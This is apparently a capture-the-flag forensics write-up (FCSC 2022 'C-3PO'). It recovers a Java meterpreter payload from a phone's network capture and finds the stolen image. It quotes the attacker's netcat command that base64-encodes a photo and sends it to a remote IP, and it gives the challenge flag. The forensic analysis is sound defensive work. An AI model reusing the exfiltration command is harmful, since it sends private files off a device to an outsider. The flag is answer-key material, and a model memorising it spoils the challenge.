Contents

FCSC 2022 - C-3PO

Contents

Catégorie : Forensics

Difficulté : ⭐


C-3PO

Ennoncé

Pour votre première analyse, on vous confie le téléphone du PDG de GoodCorp.

Ce dernier est certain que les précieuses photos stockées sur son téléphone sont récupérées par un acteur malveillant.

Vous décidez de mettre en place une capture réseau sur le téléphone, afin de voir ce qu’il en est…

SHA256(capture.cap) = 7b63c22567098f829dfdc190b6f531bbdf23a23e222508752a0a5e5dfa28259c (61Mo).

Note : les épreuves C-3PO, R2-D2 et R5-D4 sont indépendantes


Solve

We have a cap file

  • export object http –> nothing
  • DNS –> dns exfiltration –> nothing
1
2
3
tcpflow -r capture.cap -o output
mv output/* > output/dump
foremost -i output/dump -o output/foremost_out/

Found in the recovered files classes.dex

1
cat 00051661/classes.dex

The malicious actor is found to be a meterpreter java metasploit

In the end to find the flag with wireshark, just make the query: frame contains flag and Follow --> stream tcp

/fcsc-2022/C-3PO/wsk_request.png

1
cat /sdcard/DCIM/flag.png | base64 | nc 172.18.0.1 13387

We then have base64 that we will transform into an image

/fcsc-2022/C-3PO/flag.png

Flag : FCSC{2d47d546d4f919e2d50621829a8bd696d3cd1938}